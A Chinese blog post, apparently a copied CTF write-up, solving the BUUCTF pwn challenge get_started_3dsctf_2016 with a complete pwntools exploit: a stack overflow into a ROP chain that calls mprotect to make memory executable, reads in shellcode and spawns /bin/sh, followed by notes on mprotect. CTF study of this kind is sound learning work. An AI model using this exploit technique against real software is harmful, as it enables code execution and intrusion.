get_started_3dsctf_2016 | PWN | BUUCTF | mprotect函数

最新推荐文章于 2024-07-07 17:28:09 发布
最新推荐文章于 2024-07-07 17:28:09 发布
阅读量208 收藏
点赞数
文章标签: 安全
原文链接:https://www.cnblogs.com/gaonuoqi/p/12299698.html
版权

【声明:我不会做,所以学习别人的看看能不能看懂】

from pwn import *
context(arch='i386',os='linux')

r=remote('node4.buuoj.cn',29114)
elf=ELF('./get_started_3dsctf_2016')
mprotect_addr=elf.symbols['mprotect']
read_addr=elf.symbols['read']
main_addr=elf.symbols['main']
ppp3_addr=0x080483b8  #这里有三个pop

mpr_start=0x80eb000  #got.plt表的开头
mpr_len=0x1000
mpr_prot=7  #rxw=7

shellcode=asm(shellcraft.sh()) 
#asm()函数接收一个字符串作为参数,得到汇编码的机器代码
#shellcraft模块是shellcode的模块,包含一些生成shellcode的函数
#shellcraft.sh()则是执行/bin/sh的shellcode
#总而言之,那是不是可以直接shellcode='/bin/sh'呢?是不可以的。

payload='a'*0x38 #在main函数看到v4是0x38哦
payload+=p32(mprotect_addr)+p32(ppp3_addr)+p32(mpr_start)+p32(mpr_len)+p32(mpr_prot)
payload+=p32(read_addr)+p32(ppp3_addr)+p32(0x0)+p32(mpr_start)+p32(len(shellcode))
payload+=p32(mpr_start)
r.sendline(payload)
#先让gets溢出
#然后利用mprotect函数修改bss权限,利用三个pop将addr、len、prot传入mprotect函数中
#然后用read,再pop进len(shellcode)
#(最后回到start这个位置写入shellcode)
r.sendline(shellcode)
r.interactive()

请添加图片描述
请添加图片描述
在这里插入图片描述

1. mprotect函数

可以修改调用进程内存页的保护属性,如果调用进程尝试以违反保护属性的方式访问该内存,则内核会发出一个SIGSEGV信号给该进程。

可以修改程序内存里面的权限。

int mprotect(const void *start, size_t len, int prot);
#start是要修改的起始的内存地址
#len是修改的长度
#prot修改的权限

addr:修改保护属性区域的起始地址,addr必须是一个内存页的起始地址,简而言之为页大小(一般是 4KB == 4096字节)整数倍。

len:被修改保护属性区域的长度,最好为页大小整数倍。修改区域范围[addr, addr+len-1]。

prot:可以取以下几个值,并可以用“|”将几个属性结合起来使用:
1)PROT_READ:内存段可读;
2)PROT_WRITE:内存段可写;
3)PROT_EXEC:内存段可执行;
4)PROT_NONE:内存段不可访问。
返回值:0;成功,-1;失败(并且errno被设置)
1)EACCES:无法设置内存段的保护属性。当通过 mmap(2) 映射一个文件为只读权限时,接着使用 mprotect() 标志为 PROT_WRITE这种情况就会发生。
2)EINVAL:addr不是有效指针,或者不是系统页大小的倍数。
3)ENOMEM:内核内部的结构体无法分配。
————————————————
版权声明:本文为CSDN博主「qiu.s.z」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_15762939/article/details/104062307

在这里插入图片描述

Dem1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mprotect()
刘松华-林散
05-15 1149
mprotect: 设置内存访问权限 mmap 的第三个参数指定对内存区域的保护,由标记读、写、执行权限的 PROT_READ、PROT_WRITE 和 PROT_EXEC 按位与操作获得,或者是限制没有访问权限的 PROT_NONE。如果程序尝试在不允许这些权限的本地内存上操作,它将被 SIGSEGV 信号(Segmentation fault,段错误)终止。 在内存映射完成后,这些权限仍可以被
pwn入门之mprotect函数的利用
wangxunyu6的博客
01-24 1260
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这题是64位的所以着重讲一下pay的构造。
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1031
mprotect的运用
CTFpwn:ret2text,mprotece,shellcode,自动化rop链
2302_79813730的博客
01-25 933
text:0000000000401324 75 EA jnz short loc_401310 #对比rbp里的值与rbx里的值,如果相同就继续运行程序,如果不同就返回0x401310。先将栈溢出的返回地址填成0x40132A,将需要的数据依次填入栈顶,依次弹入寄存器中,随后在执行到0x401334,retn返回的时候将返回地址填成0x401310,这样,我们就可以控制edi,rsi,rdx里的值,并调用write函数泄露基址。
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1227
get_started_3dsctf_2016
buuctf13-17题
XDiku的博客
01-29 146
ok
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 学习和理解这些代码,可以帮助开发者深入掌握ARM7处理器上的PWM接口实现,以及如何在汇编和C语言之间...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
3. **复用和同步**:确保所有操作都在正确的时钟边沿进行,防止竞争冒险和 metastability 问题。 4. **测试平台**:为了验证Verilog代码的正确性,需要创建一个测试平台,提供各种输入值并检查输出是否符合预期。 ...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
BUUCTF--get_started_3dsctf_20161
qq_30528603的博客
01-12 463
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 335
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
get_started_3dsctf_2016
XJQ100717的博客
12-30 548
今天咱们看的是这道题,刚开始把我都看蒙圈了,里面的函数看都看不完,看都看不懂,真的很烦。真的不让小白活呀!!!!为了使更多小白可以看的懂,我会写的详细一些。
buu get_started_3dsctf_2016 关于内平栈和外平栈
qq_60209620的博客
03-30 413
main中get函数存在栈溢出:找到后门函数get_shell:a1和a2是栈上的参数,所以我们在栈溢出时提前设置好就能绕过,成功读取flag但是很遗憾,打不通远程。
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1039
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1964
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
BJD3rd(DASCTFpwn部分题目整理 (oj, stack_chk_fail, __libc_csu_fini, mprotect, init, orw,汇编)
carol2358的博客
05-26 1503
TaQiniOJ-0 #include “/home/ctf/fl ag”@Y Memory Monster I 有canary,利用触发canary时的__stack_chk_fail和题目的任意地址任意写,改写__stack_chk_fail为backdoor exp: from pwn import * from LibcSearcher import * local_file = './Memory_Monster_I' local_libc = '/lib/x86_64-li...
攻防世界Pwn题:利用FSA漏洞执行cat_flag
在"攻防世界pwn题:forgot.doc"文档中,我们探讨了一个关于利用有限状态自动机(FSA)中的漏洞来实现电子邮件地址验证的挑战。福克斯设计了一个题目,其中包含了一个32位的可执行文件,具有canary和PIE保护机制关闭,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值